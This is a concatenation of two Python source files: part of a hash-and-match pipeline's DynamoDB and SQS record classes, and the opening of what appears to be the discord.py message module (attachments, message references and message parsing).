return k[len(prefix) :]
@classmethod
def deserialize_signal_specific_attributes(
cls, d: t.Dict[str, t.Any]
) -> t.Dict[str, t.Union[int, float, str]]:
"""
Reverses serialize_signal_specific_attributes.
"""
signal_type = d["SignalType"]
signal_type_prefix = f"{signal_type}_"
return {
cls._signal_specific_attribute_remove_prefix(signal_type_prefix, key): value
for key, value in d.items()
if key.startswith(signal_type_prefix)
}
@dataclass
class PipelineHashRecord(PipelineRecordDefaultsBase, PipelineRecordBase):
"""
Successful execution at the hasher produces this record.
"""
def to_dynamodb_item(self) -> dict:
top_level_overrides = self.serialize_signal_specific_attributes()
return dict(
**top_level_overrides,
**{
"PK": self.get_dynamodb_content_key(self.content_id),
"SK": self.get_dynamodb_type_key(self.signal_type.get_name()),
"ContentHash": self.content_hash,
"SignalType": self.signal_type.get_name(),
"GSI2-PK": self.get_dynamodb_type_key(self.__class__.__name__),
"UpdatedAt": self.updated_at.isoformat(),
},
)
def to_legacy_sqs_message(self) -> dict:
"""
Prior to supporting MD5, the hash message was simplistic and did not
support all fields in the PipelineHashRecord. This is inconsistent with
almost all other message models.
We can remove this once pdq_hasher and pdq_matcher are removed.
"""
return {
"hash": self.content_hash,
"type": self.signal_type.get_name(),
"key": self.content_id,
}
def to_sqs_message(self) -> dict:
return {
"ContentId": self.content_id,
"SignalType": self.signal_type.get_name(),
"ContentHash": self.content_hash,
"SignalSpecificAttributes": self.signal_specific_attributes,
"UpdatedAt": self.updated_at.isoformat(),
}
@classmethod
def from_sqs_message(cls, d: dict) -> "PipelineHashRecord":
return cls(
content_id=d["ContentId"],
signal_type=get_signal_types_by_name()[d["SignalType"]],
content_hash=d["ContentHash"],
signal_specific_attributes=d["SignalSpecificAttributes"],
updated_at=datetime.datetime.fromisoformat(d["UpdatedAt"]),
)
@classmethod
def could_be(cls, d: dict) -> bool:
"""
Return True if this dict can be converted to a PipelineHashRecord
"""
return "ContentId" in d and "SignalType" in d and "ContentHash" in d
@classmethod
def get_from_content_id(
cls,
table: Table,
content_id: str,
signal_type: t.Optional[t.Type[SignalType]] = None,
) -> t.List["PipelineHashRecord"]:
"""
Returns all available PipelineHashRecords for a content_id.
"""
expected_pk = cls.get_dynamodb_content_key(content_id)
if signal_type is None:
condition_expression = Key("PK").eq(expected_pk) & Key("SK").begins_with(
DynamoDBItem.TYPE_PREFIX
)
else:
condition_expression = Key("PK").eq(expected_pk) & Key("SK").eq(
DynamoDBItem.get_dynamodb_type_key(signal_type.get_name())
)
return cls._result_items_to_records(
table.query(
KeyConditionExpression=condition_expression,
).get("Items", [])
)
@classmethod
def get_recent_items_page(
cls, table: Table, exclusive_start_key: t.Optional[DynamoDBCursorKey] = None
) -> RecentItems:
"""
Get a paginated list of recent items.
"""
if not exclusive_start_key:
# Evidently, https://github.com/boto/boto3/issues/2813 boto is able
# to distinguish fun(Parameter=None) from fun(). So, we can't use
# exclusive_start_key's optionality. We have to do an if clause!
# Fun!
result = table.query(
IndexName="GSI-2",
ScanIndexForward=False,
Limit=100,
KeyConditionExpression=Key("GSI2-PK").eq(
DynamoDBItem.get_dynamodb_type_key(cls.__name__)
),
)
else:
result = table.query(
IndexName="GSI-2",
ExclusiveStartKey=exclusive_start_key,
ScanIndexForward=False,
Limit=100,
KeyConditionExpression=Key("GSI2-PK").eq(
DynamoDBItem.get_dynamodb_type_key(cls.__name__)
),
)
return RecentItems(
t.cast(DynamoDBCursorKey, result.get("LastEvaluatedKey", None)),
cls._result_items_to_records(result["Items"]),
)
@classmethod
def _result_items_to_records(
cls,
items: t.List[t.Dict],
) -> t.List["PipelineHashRecord"]:
"""
        Convert raw DynamoDB result items into PipelineHashRecord objects.
"""
return [
PipelineHashRecord(
content_id=item["PK"][len(cls.CONTENT_KEY_PREFIX) :],
signal_type=get_signal_types_by_name()[item["SignalType"]],
content_hash=item["ContentHash"],
updated_at=datetime.datetime.fromisoformat(item["UpdatedAt"]),
signal_specific_attributes=cls.deserialize_signal_specific_attributes(
item
),
)
for item in items
]
@dataclass
class _MatchRecord(PipelineRecordBase):
"""
Successful execution at the matcher produces this record.
"""
signal_id: str
signal_source: str
signal_hash: str
@dataclass
class MatchRecord(PipelineRecordDefaultsBase, _MatchRecord):
"""
Weird, innit? You can't introduce non-default fields after default fields.
All default fields in PipelineRecordBase are actually in
PipelineRecordDefaultsBase and this complex inheritance chain allows you to
create an MRO that is legal.
H/T:
https://stackoverflow.com/questions/51575931/class-inheritance-in-python-3-7-dataclasses
"""
def to_dynamodb_item(self) -> dict:
top_level_overrides = self.serialize_signal_specific_attributes()
return dict(
**top_level_overrides,
**{
"PK": self.get_dynamodb_content_key(self.content_id),
"SK": self.get_dynamodb_signal_key(self.signal_source, self.signal_id),
"ContentHash": self.content_hash,
"UpdatedAt": self.updated_at.isoformat(),
"SignalHash": self.signal_hash,
"SignalSource": self.signal_source,
"SignalType": self.signal_type.get_name(),
"GSI1-PK": self.get_dynamodb_signal_key(
self.signal_source, self.signal_id
),
"GSI1-SK": self.get_dynamodb_content_key(self.content_id),
"HashType": self.signal_type.get_name(),
"GSI2-PK": self.get_dynamodb_type_key(self.__class__.__name__),
},
)
def to_sqs_message(self) -> dict:
# TODO add method for when matches are added to a sqs
raise NotImplementedError
@classmethod
def get_from_content_id(
cls, table: Table, content_id: str
) -> t.List["MatchRecord"]:
"""
Return all matches for a content_id.
"""
content_key = DynamoDBItem.get_dynamodb_content_key(content_id)
source_prefix = DynamoDBItem.SIGNAL_KEY_PREFIX
return cls._result_items_to_records(
table.query(
KeyConditionExpression=Key("PK").eq(content_key)
& Key("SK").begins_with(source_prefix),
).get("Items", [])
)
@classmethod
def get_from_signal(
cls, table: Table, signal_id: t.Union[str, int], signal_source: str
) -> t.List["MatchRecord"]:
"""
Return all matches for a signal. Needs source and id to uniquely
identify a signal.
"""
signal_key = DynamoDBItem.get_dynamodb_signal_key(signal_source, signal_id)
return cls._result_items_to_records(
table.query(
IndexName="GSI-1",
KeyConditionExpression=Key("GSI1-PK").eq(signal_key),
).get("Items", [])
)
@classmethod
def get_recent_items_page(
cls, table: Table, exclusive_start_key: t.Optional[DynamoDBCursorKey] = None
) -> RecentItems:
"""
Get a paginated list of recent match records. Subsequent calls must use
`return_value.last_evaluated_key`.
"""
if not exclusive_start_key:
# Evidently, https://github.com/boto/boto3/issues/2813 boto is able
# to distinguish fun(Parameter=None) from fun(). So, we can't use
# exclusive_start_key's optionality. We have to do an if clause!
# Fun!
result = table.query(
IndexName="GSI-2",
Limit=100,
ScanIndexForward=False,
KeyConditionExpression=Key("GSI2-PK").eq(
DynamoDBItem.get_dynamodb_type_key(cls.__name__)
),
)
else:
result = table.query(
IndexName="GSI-2",
Limit=100,
ExclusiveStartKey=exclusive_start_key,
ScanIndexForward=False,
KeyConditionExpression=Key("GSI2-PK").eq(
DynamoDBItem.get_dynamodb_type_key(cls.__name__)
),
)
return RecentItems(
t.cast(DynamoDBCursorKey, result.get("LastEvaluatedKey", None)),
cls._result_items_to_records(result["Items"]),
)
@classmethod
def _result_items_to_records(
cls,
items: t.List[t.Dict],
) -> t.List["MatchRecord"]:
return [
MatchRecord(
content_id=cls.remove_content_key_prefix(item["PK"]),
content_hash=item["ContentHash"],
updated_at=datetime.datetime.fromisoformat(item["UpdatedAt"]),
signal_type=get_signal_types_by_name()[item["SignalType"]],
signal_id=cls.remove_signal_key_prefix(
item["SK"], item["SignalSource"]
),
signal_source=item["SignalSource"],
signal_hash=item["SignalHash"],
signal_specific_attributes=cls.deserialize_signal_specific_attributes(
item
),
)
for item in items
]
|
py | 7df7f6c9db33a2ef20ce9a7b5ca92fe9e86a1a01 | # -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import asyncio
import datetime
import re
import io
from . import utils
from .reaction import Reaction
from .emoji import Emoji
from .partial_emoji import PartialEmoji
from .calls import CallMessage
from .enums import MessageType, ChannelType, try_enum
from .errors import InvalidArgument, ClientException, HTTPException
from .embeds import Embed
from .member import Member
from .flags import MessageFlags
from .file import File
from .utils import escape_mentions
from .guild import Guild
from .mixins import Hashable
from .sticker import Sticker
__all__ = (
'Attachment',
'Message',
'PartialMessage',
'MessageReference',
'DeletedReferencedMessage',
)
def convert_emoji_reaction(emoji):
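    # e.g. Emoji(name='thonk', id=123) -> 'thonk:123'; the string '<:thonk:123>' -> ':thonk:123'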
if isinstance(emoji, Reaction):
emoji = emoji.emoji
if isinstance(emoji, Emoji):
return '%s:%s' % (emoji.name, emoji.id)
if isinstance(emoji, PartialEmoji):
return emoji._as_reaction()
if isinstance(emoji, str):
# Reactions can be in :name:id format, but not <:name:id>.
# No existing emojis have <> in them, so this should be okay.
return emoji.strip('<>')
raise InvalidArgument('emoji argument must be str, Emoji, or Reaction not {.__class__.__name__}.'.format(emoji))
class Attachment:
"""Represents an attachment from Discord.
Attributes
------------
id: :class:`int`
The attachment ID.
size: :class:`int`
The attachment size in bytes.
height: Optional[:class:`int`]
The attachment's height, in pixels. Only applicable to images and videos.
width: Optional[:class:`int`]
The attachment's width, in pixels. Only applicable to images and videos.
filename: :class:`str`
The attachment's filename.
url: :class:`str`
The attachment URL. If the message this attachment was attached
to is deleted, then this will 404.
proxy_url: :class:`str`
The proxy URL. This is a cached version of the :attr:`~Attachment.url` in the
case of images. When the message is deleted, this URL might be valid for a few
minutes or not valid at all.
"""
__slots__ = ('id', 'size', 'height', 'width', 'filename', 'url', 'proxy_url', '_http')
def __init__(self, *, data, state):
self.id = int(data['id'])
self.size = data['size']
self.height = data.get('height')
self.width = data.get('width')
self.filename = data['filename']
self.url = data.get('url')
self.proxy_url = data.get('proxy_url')
self._http = state.http
def is_spoiler(self):
""":class:`bool`: Whether this attachment contains a spoiler."""
return self.filename.startswith('SPOILER_')
def __repr__(self):
return '<Attachment id={0.id} filename={0.filename!r} url={0.url!r}>'.format(self)
async def save(self, fp, *, seek_begin=True, use_cached=False):
"""|coro|
Saves this attachment into a file-like object.
Parameters
-----------
fp: Union[:class:`io.BufferedIOBase`, :class:`os.PathLike`]
The file-like object to save this attachment to or the filename
to use. If a filename is passed then a file is created with that
filename and used instead.
seek_begin: :class:`bool`
Whether to seek to the beginning of the file after saving is
successfully done.
use_cached: :class:`bool`
Whether to use :attr:`proxy_url` rather than :attr:`url` when downloading
the attachment. This will allow attachments to be saved after deletion
more often, compared to the regular URL which is generally deleted right
after the message is deleted. Note that this can still fail to download
deleted attachments if too much time has passed and it does not work
on some types of attachments.
Raises
--------
HTTPException
Saving the attachment failed.
NotFound
The attachment was deleted.
Returns
--------
:class:`int`
The number of bytes written.
"""
data = await self.read(use_cached=use_cached)
if isinstance(fp, io.IOBase) and fp.writable():
written = fp.write(data)
if seek_begin:
fp.seek(0)
return written
else:
with open(fp, 'wb') as f:
return f.write(data)
async def read(self, *, use_cached=False):
"""|coro|
Retrieves the content of this attachment as a :class:`bytes` object.
.. versionadded:: 1.1
Parameters
-----------
use_cached: :class:`bool`
Whether to use :attr:`proxy_url` rather than :attr:`url` when downloading
the attachment. This will allow attachments to be saved after deletion
more often, compared to the regular URL which is generally deleted right
after the message is deleted. Note that this can still fail to download
deleted attachments if too much time has passed and it does not work
on some types of attachments.
Raises
------
HTTPException
Downloading the attachment failed.
Forbidden
You do not have permissions to access this attachment
NotFound
The attachment was deleted.
Returns
-------
:class:`bytes`
The contents of the attachment.
"""
url = self.proxy_url if use_cached else self.url
data = await self._http.get_from_cdn(url)
return data
async def to_file(self, *, use_cached=False, spoiler=False):
"""|coro|
Converts the attachment into a :class:`File` suitable for sending via
:meth:`abc.Messageable.send`.
.. versionadded:: 1.3
Parameters
-----------
use_cached: :class:`bool`
Whether to use :attr:`proxy_url` rather than :attr:`url` when downloading
the attachment. This will allow attachments to be saved after deletion
more often, compared to the regular URL which is generally deleted right
after the message is deleted. Note that this can still fail to download
deleted attachments if too much time has passed and it does not work
on some types of attachments.
.. versionadded:: 1.4
spoiler: :class:`bool`
Whether the file is a spoiler.
.. versionadded:: 1.4
Raises
------
HTTPException
Downloading the attachment failed.
Forbidden
You do not have permissions to access this attachment
NotFound
The attachment was deleted.
Returns
-------
:class:`File`
The attachment as a file suitable for sending.
"""
data = await self.read(use_cached=use_cached)
return File(io.BytesIO(data), filename=self.filename, spoiler=spoiler)
class DeletedReferencedMessage:
"""A special sentinel type that denotes whether the
resolved message referenced message had since been deleted.
The purpose of this class is to separate referenced messages that could not be
fetched and those that were previously fetched but have since been deleted.
.. versionadded:: 1.6
"""
__slots__ = ('_parent')
def __init__(self, parent):
self._parent = parent
@property
def id(self):
""":class:`int`: The message ID of the deleted referenced message."""
return self._parent.message_id
@property
def channel_id(self):
""":class:`int`: The channel ID of the deleted referenced message."""
return self._parent.channel_id
@property
def guild_id(self):
"""Optional[:class:`int`]: The guild ID of the deleted referenced message."""
return self._parent.guild_id
class MessageReference:
"""Represents a reference to a :class:`~discord.Message`.
.. versionadded:: 1.5
.. versionchanged:: 1.6
This class can now be constructed by users.
Attributes
-----------
message_id: Optional[:class:`int`]
The id of the message referenced.
channel_id: :class:`int`
The channel id of the message referenced.
guild_id: Optional[:class:`int`]
The guild id of the message referenced.
resolved: Optional[Union[:class:`Message`, :class:`DeletedReferencedMessage`]]
The message that this reference resolved to. If this is ``None``
then the original message was not fetched either due to the Discord API
not attempting to resolve it or it not being available at the time of creation.
If the message was resolved at a prior point but has since been deleted then
this will be of type :class:`DeletedReferencedMessage`.
Currently, this is mainly the replied to message when a user replies to a message.
.. versionadded:: 1.6
"""
__slots__ = ('message_id', 'channel_id', 'guild_id', 'resolved', '_state')
def __init__(self, *, message_id, channel_id, guild_id=None):
self._state = None
self.resolved = None
self.message_id = message_id
self.channel_id = channel_id
self.guild_id = guild_id
@classmethod
def with_state(cls, state, data):
self = cls.__new__(cls)
self.message_id = utils._get_as_snowflake(data, 'message_id')
self.channel_id = int(data.pop('channel_id'))
self.guild_id = utils._get_as_snowflake(data, 'guild_id')
self._state = state
self.resolved = None
return self
@classmethod
def from_message(cls, message):
"""Creates a :class:`MessageReference` from an existing :class:`~discord.Message`.
.. versionadded:: 1.6
Parameters
----------
message: :class:`~discord.Message`
The message to be converted into a reference.
Returns
-------
:class:`MessageReference`
A reference to the message.
"""
self = cls(message_id=message.id, channel_id=message.channel.id, guild_id=getattr(message.guild, 'id', None))
self._state = message._state
return self
@property
def cached_message(self):
"""Optional[:class:`~discord.Message`]: The cached message, if found in the internal message cache."""
return self._state._get_message(self.message_id)
@property
def jump_url(self):
""":class:`str`: Returns a URL that allows the client to jump to the referenced message.
.. versionadded:: 1.7
"""
guild_id = self.guild_id if self.guild_id is not None else '@me'
return 'https://discord.com/channels/{0}/{1.channel_id}/{1.message_id}'.format(guild_id, self)
def __repr__(self):
return '<MessageReference message_id={0.message_id!r} channel_id={0.channel_id!r} guild_id={0.guild_id!r}>'.format(self)
def to_dict(self):
result = {'message_id': self.message_id} if self.message_id is not None else {}
result['channel_id'] = self.channel_id
if self.guild_id is not None:
result['guild_id'] = self.guild_id
return result
to_message_reference_dict = to_dict
def flatten_handlers(cls):
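    # Build ("pinned", cls._handle_pinned)-style pairs from the class's _handle_* methods so that
    # _update() can dispatch incoming payload keys without a long if/elif chain.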
prefix = len('_handle_')
handlers = [
(key[prefix:], value)
for key, value in cls.__dict__.items()
if key.startswith('_handle_') and key != '_handle_member'
]
# store _handle_member last
handlers.append(('member', cls._handle_member))
cls._HANDLERS = handlers
cls._CACHED_SLOTS = [
attr for attr in cls.__slots__ if attr.startswith('_cs_')
]
return cls
@flatten_handlers
class Message(Hashable):
r"""Represents a message from Discord.
.. container:: operations
.. describe:: x == y
Checks if two messages are equal.
.. describe:: x != y
Checks if two messages are not equal.
.. describe:: hash(x)
Returns the message's hash.
Attributes
-----------
tts: :class:`bool`
Specifies if the message was done with text-to-speech.
This can only be accurately received in :func:`on_message` due to
a discord limitation.
type: :class:`MessageType`
The type of message. In most cases this should not be checked, but it is helpful
in cases where it might be a system message for :attr:`system_content`.
author: :class:`abc.User`
A :class:`Member` that sent the message. If :attr:`channel` is a
        private channel or the user has left the guild, then it is a :class:`User` instead.
content: :class:`str`
The actual contents of the message.
nonce
The value used by the discord guild and the client to verify that the message is successfully sent.
This is typically non-important.
embeds: List[:class:`Embed`]
A list of embeds the message has.
channel: Union[:class:`abc.Messageable`]
The :class:`TextChannel` that the message was sent from.
Could be a :class:`DMChannel` or :class:`GroupChannel` if it's a private message.
call: Optional[:class:`CallMessage`]
The call that the message refers to. This is only applicable to messages of type
:attr:`MessageType.call`.
reference: Optional[:class:`~discord.MessageReference`]
The message that this message references. This is only applicable to messages of
type :attr:`MessageType.pins_add`, crossposted messages created by a
followed channel integration, or message replies.
.. versionadded:: 1.5
mention_everyone: :class:`bool`
Specifies if the message mentions everyone.
.. note::
This does not check if the ``@everyone`` or the ``@here`` text is in the message itself.
Rather this boolean indicates if either the ``@everyone`` or the ``@here`` text is in the message
**and** it did end up mentioning.
mentions: List[:class:`abc.User`]
A list of :class:`Member` that were mentioned. If the message is in a private message
then the list will be of :class:`User` instead. For messages that are not of type
:attr:`MessageType.default`\, this array can be used to aid in system messages.
For more information, see :attr:`system_content`.
.. warning::
The order of the mentions list is not in any particular order so you should
not rely on it. This is a Discord limitation, not one with the library.
channel_mentions: List[:class:`abc.GuildChannel`]
A list of :class:`abc.GuildChannel` that were mentioned. If the message is in a private message
then the list is always empty.
role_mentions: List[:class:`Role`]
A list of :class:`Role` that were mentioned. If the message is in a private message
then the list is always empty.
id: :class:`int`
The message ID.
webhook_id: Optional[:class:`int`]
If this message was sent by a webhook, then this is the webhook ID's that sent this
message.
attachments: List[:class:`Attachment`]
A list of attachments given to a message.
pinned: :class:`bool`
Specifies if the message is currently pinned.
flags: :class:`MessageFlags`
Extra features of the message.
.. versionadded:: 1.3
reactions : List[:class:`Reaction`]
Reactions to a message. Reactions can be either custom emoji or standard unicode emoji.
activity: Optional[:class:`dict`]
        The activity associated with this message. Sent with Rich-Presence related messages that, for
        example, request joining, spectating, or listening to or with another member.
It is a dictionary with the following optional keys:
- ``type``: An integer denoting the type of message activity being requested.
- ``party_id``: The party ID associated with the party.
application: Optional[:class:`dict`]
The rich presence enabled application associated with this message.
It is a dictionary with the following keys:
- ``id``: A string representing the application's ID.
- ``name``: A string representing the application's name.
- ``description``: A string representing the application's description.
- ``icon``: A string representing the icon ID of the application.
- ``cover_image``: A string representing the embed's image asset ID.
stickers: List[:class:`Sticker`]
A list of stickers given to the message.
.. versionadded:: 1.6
"""
__slots__ = ('_edited_timestamp', 'tts', 'content', 'channel', 'webhook_id',
'mention_everyone', 'embeds', 'id', 'mentions', 'author',
'_cs_channel_mentions', '_cs_raw_mentions', 'attachments',
'_cs_clean_content', '_cs_raw_channel_mentions', 'nonce', 'pinned',
'role_mentions', '_cs_raw_role_mentions', 'type', 'call', 'flags',
'_cs_system_content', '_cs_guild', '_state', 'reactions', 'reference',
'application', 'activity', 'stickers')
def __init__(self, *, state, channel, data):
self._state = state
self.id = int(data['id'])
self.webhook_id = utils._get_as_snowflake(data, 'webhook_id')
self.reactions = [Reaction(message=self, data=d) for d in data.get('reactions', [])]
self.attachments = [Attachment(data=a, state=self._state) for a in data['attachments']]
self.embeds = [Embed.from_dict(a) for a in data['embeds']]
self.application = data.get('application')
self.activity = data.get('activity')
self.channel = channel
self.call = None
self._edited_timestamp = utils.parse_time(data['edited_timestamp'])
self.type = try_enum(MessageType, data['type'])
self.pinned = data['pinned']
self.flags = MessageFlags._from_value(data.get('flags', 0))
self.mention_everyone = data['mention_everyone']
self.tts = data['tts']
self.content = data['content']
self.nonce = data.get('nonce')
self.stickers = [Sticker(data=data, state=state) for data in data.get('stickers', [])]
try:
ref = data['message_reference']
except KeyError:
self.reference = None
else:
self.reference = ref = MessageReference.with_state(state, ref)
try:
resolved = data['referenced_message']
except KeyError:
pass
else:
if resolved is None:
ref.resolved = DeletedReferencedMessage(ref)
else:
# Right now the channel IDs match but maybe in the future they won't.
if ref.channel_id == channel.id:
chan = channel
else:
chan, _ = state._get_guild_channel(resolved)
ref.resolved = self.__class__(channel=chan, data=resolved, state=state)
for handler in ('author', 'member', 'mentions', 'mention_roles', 'call', 'flags'):
try:
getattr(self, '_handle_%s' % handler)(data[handler])
except KeyError:
continue
def __repr__(self):
return '<Message id={0.id} channel={0.channel!r} type={0.type!r} author={0.author!r} flags={0.flags!r}>'.format(self)
def _try_patch(self, data, key, transform=None):
try:
value = data[key]
except KeyError:
pass
else:
if transform is None:
setattr(self, key, value)
else:
setattr(self, key, transform(value))
def _add_reaction(self, data, emoji, user_id):
reaction = utils.find(lambda r: r.emoji == emoji, self.reactions)
is_me = data['me'] = user_id == self._state.self_id
if reaction is None:
reaction = Reaction(message=self, data=data, emoji=emoji)
self.reactions.append(reaction)
else:
reaction.count += 1
if is_me:
reaction.me = is_me
return reaction
def _remove_reaction(self, data, emoji, user_id):
reaction = utils.find(lambda r: r.emoji == emoji, self.reactions)
if reaction is None:
# already removed?
raise ValueError('Emoji already removed?')
# if reaction isn't in the list, we crash. This means discord
# sent bad data, or we stored improperly
reaction.count -= 1
if user_id == self._state.self_id:
reaction.me = False
if reaction.count == 0:
# this raises ValueError if something went wrong as well.
self.reactions.remove(reaction)
return reaction
def _clear_emoji(self, emoji):
to_check = str(emoji)
for index, reaction in enumerate(self.reactions):
if str(reaction.emoji) == to_check:
break
else:
# didn't find anything so just return
return
del self.reactions[index]
return reaction
def _update(self, data):
# In an update scheme, 'author' key has to be handled before 'member'
# otherwise they overwrite each other which is undesirable.
# Since there's no good way to do this we have to iterate over every
# handler rather than iterating over the keys which is a little slower
for key, handler in self._HANDLERS:
try:
value = data[key]
except KeyError:
continue
else:
handler(self, value)
# clear the cached properties
for attr in self._CACHED_SLOTS:
try:
delattr(self, attr)
except AttributeError:
pass
def _handle_edited_timestamp(self, value):
self._edited_timestamp = utils.parse_time(value)
def _handle_pinned(self, value):
self.pinned = value
def _handle_flags(self, value):
self.flags = MessageFlags._from_value(value)
def _handle_application(self, value):
self.application = value
def _handle_activity(self, value):
self.activity = value
def _handle_mention_everyone(self, value):
self.mention_everyone = value
def _handle_tts(self, value):
self.tts = value
def _handle_type(self, value):
self.type = try_enum(MessageType, value)
def _handle_content(self, value):
self.content = value
def _handle_attachments(self, value):
self.attachments = [Attachment(data=a, state=self._state) for a in value]
def _handle_embeds(self, value):
self.embeds = [Embed.from_dict(data) for data in value]
def _handle_nonce(self, value):
self.nonce = value
def _handle_author(self, author):
self.author = self._state.store_user(author)
if isinstance(self.guild, Guild):
found = self.guild.get_member(self.author.id)
if found is not None:
self.author = found
def _handle_member(self, member):
# The gateway now gives us full Member objects sometimes with the following keys
# deaf, mute, joined_at, roles
# For the sake of performance I'm going to assume that the only
# field that needs *updating* would be the joined_at field.
# If there is no Member object (for some strange reason), then we can upgrade
# ourselves to a more "partial" member object.
author = self.author
try:
# Update member reference
author._update_from_message(member)
except AttributeError:
# It's a user here
# TODO: consider adding to cache here
self.author = Member._from_message(message=self, data=member)
def _handle_mentions(self, mentions):
self.mentions = r = []
guild = self.guild
state = self._state
if not isinstance(guild, Guild):
self.mentions = [state.store_user(m) for m in mentions]
return
for mention in filter(None, mentions):
id_search = int(mention['id'])
member = guild.get_member(id_search)
if member is not None:
r.append(member)
else:
r.append(Member._try_upgrade(data=mention, guild=guild, state=state))
def _handle_mention_roles(self, role_mentions):
self.role_mentions = []
if isinstance(self.guild, Guild):
for role_id in map(int, role_mentions):
role = self.guild.get_role(role_id)
if role is not None:
self.role_mentions.append(role)
def _handle_call(self, call):
if call is None or self.type is not MessageType.call:
self.call = None
return
# we get the participant source from the mentions array or
# the author
participants = []
for uid in map(int, call.get('participants', [])):
if uid == self.author.id:
participants.append(self.author)
else:
user = utils.find(lambda u: u.id == uid, self.mentions)
if user is not None:
participants.append(user)
call['participants'] = participants
self.call = CallMessage(message=self, **call)
def _rebind_channel_reference(self, new_channel):
self.channel = new_channel
try:
del self._cs_guild
except AttributeError:
pass
@utils.cached_slot_property('_cs_guild')
def guild(self):
"""Optional[:class:`Guild`]: The guild that the message belongs to, if applicable."""
return getattr(self.channel, 'guild', None)
@utils.cached_slot_property('_cs_raw_mentions')
def raw_mentions(self):
"""List[:class:`int`]: A property that returns an array of user IDs matched with
the syntax of ``<@user_id>`` in the message content.
This allows you to receive the user IDs of mentioned users
even in a private message context.
"""
return [int(x) for x in re.findall(r'<@!?([0-9]+)>', self.content)]
@utils.cached_slot_property('_cs_raw_channel_mentions')
def raw_channel_mentions(self):
"""List[:class:`int`]: A property that returns an array of channel IDs matched with
the syntax of ``<#channel_id>`` in the message content.
"""
return [int(x) for x in re.findall(r'<#([0-9]+)>', self.content)]
@utils.cached_slot_property('_cs_raw_role_mentions')
def raw_role_mentions(self):
"""List[:class:`int`]: A property that returns an array of role IDs matched with
the syntax of ``<@&role_id>`` in the message content.
"""
return [int(x) for x in re.findall(r'<@&([0-9]+)>', self.content)]
@utils.cached_slot_property('_cs_channel_mentions')
def channel_mentions(self):
if self.guild is None:
return []
it = filter(None, map(self.guild.get_channel, self.raw_channel_mentions))
return utils._unique(it)
@utils.cached_slot_property('_cs_clean_content')
def clean_content(self):
""":class:`str`: A property that returns the content in a "cleaned up"
manner. This basically means that mentions are transformed
into the way the client shows it. e.g. ``<#id>`` will transform
into ``#name``.
This will also transform @everyone and @here mentions into
non-mentions.
.. note::
This *does not* escape markdown. If you want to escape
markdown then use :func:`utils.escape_markdown` along
with this function.
"""
transformations = {
re.escape('<#%s>' % channel.id): '#' + channel.name
for channel in self.channel_mentions
}
mention_transforms = {
re.escape('<@%s>' % member.id): '@' + member.display_name
for member in self.mentions
}
# add the <@!user_id> cases as well..
second_mention_transforms = {
re.escape('<@!%s>' % member.id): '@' + member.display_name
for member in self.mentions
}
transformations.update(mention_transforms)
transformations.update(second_mention_transforms)
if self.guild is not None:
role_transforms = {
re.escape('<@&%s>' % role.id): '@' + role.name
for role in self.role_mentions
}
transformations.update(role_transforms)
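# Every mention token collected above is keyed by its re.escape()'d literal form so that all
# of them can be substituted below in a single pass using one alternation pattern.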
def repl(obj):
return transformations.get(re.escape(obj.group(0)), '')
pattern = re.compile('|'.join(transformations.keys()))
result = pattern.sub(repl, self.content)
return escape_mentions(result)
@property
def created_at(self):
""":class:`datetime.datetime`: The message's creation time in UTC."""
return utils.snowflake_time(self.id)
@property
def edited_at(self):
"""Optional[:class:`datetime.datetime`]: A naive UTC datetime object containing the edited time of the message."""
return self._edited_timestamp
@property
def jump_url(self):
""":class:`str`: Returns a URL that allows the client to jump to this message."""
guild_id = getattr(self.guild, 'id', '@me')
return 'https://discord.com/channels/{0}/{1.channel.id}/{1.id}'.format(guild_id, self)
def is_system(self):
""":class:`bool`: Whether the message is a system message.
.. versionadded:: 1.3
"""
return self.type is not MessageType.default
@utils.cached_slot_property('_cs_system_content')
def system_content(self):
r""":class:`str`: A property that returns the content that is rendered
regardless of the :attr:`Message.type`.
In the case of :attr:`MessageType.default`\, this just returns the
regular :attr:`Message.content`. Otherwise this returns an English
message denoting the contents of the system message.
"""
if self.type is MessageType.default:
return self.content
if self.type is MessageType.pins_add:
return '{0.name} pinned a message to this channel.'.format(self.author)
if self.type is MessageType.recipient_add:
return '{0.name} added {1.name} to the group.'.format(self.author, self.mentions[0])
if self.type is MessageType.recipient_remove:
return '{0.name} removed {1.name} from the group.'.format(self.author, self.mentions[0])
if self.type is MessageType.channel_name_change:
return '{0.author.name} changed the channel name: {0.content}'.format(self)
if self.type is MessageType.channel_icon_change:
return '{0.author.name} changed the channel icon.'.format(self)
if self.type is MessageType.new_member:
formats = [
"{0} joined the party.",
"{0} is here.",
"Welcome, {0}. We hope you brought pizza.",
"A wild {0} appeared.",
"{0} just landed.",
"{0} just slid into the server.",
"{0} just showed up!",
"Welcome {0}. Say hi!",
"{0} hopped into the server.",
"Everyone welcome {0}!",
"Glad you're here, {0}.",
"Good to see you, {0}.",
"Yay you made it, {0}!",
]
# manually reconstruct the epoch with millisecond precision, because
# datetime.datetime.timestamp() doesn't return the exact posix
# timestamp with the precision that we need
created_at_ms = int((self.created_at - datetime.datetime(1970, 1, 1)).total_seconds() * 1000)
return formats[created_at_ms % len(formats)].format(self.author.name)
if self.type is MessageType.call:
# we're at the call message type now, which is a bit more complicated.
# we can make the assumption that Message.channel is a PrivateChannel
# with the type ChannelType.group or ChannelType.private
call_ended = self.call.ended_timestamp is not None
if self.channel.me in self.call.participants:
return '{0.author.name} started a call.'.format(self)
elif call_ended:
return 'You missed a call from {0.author.name}'.format(self)
else:
return '{0.author.name} started a call \N{EM DASH} Join the call.'.format(self)
if self.type is MessageType.premium_guild_subscription:
return '{0.author.name} just boosted the server!'.format(self)
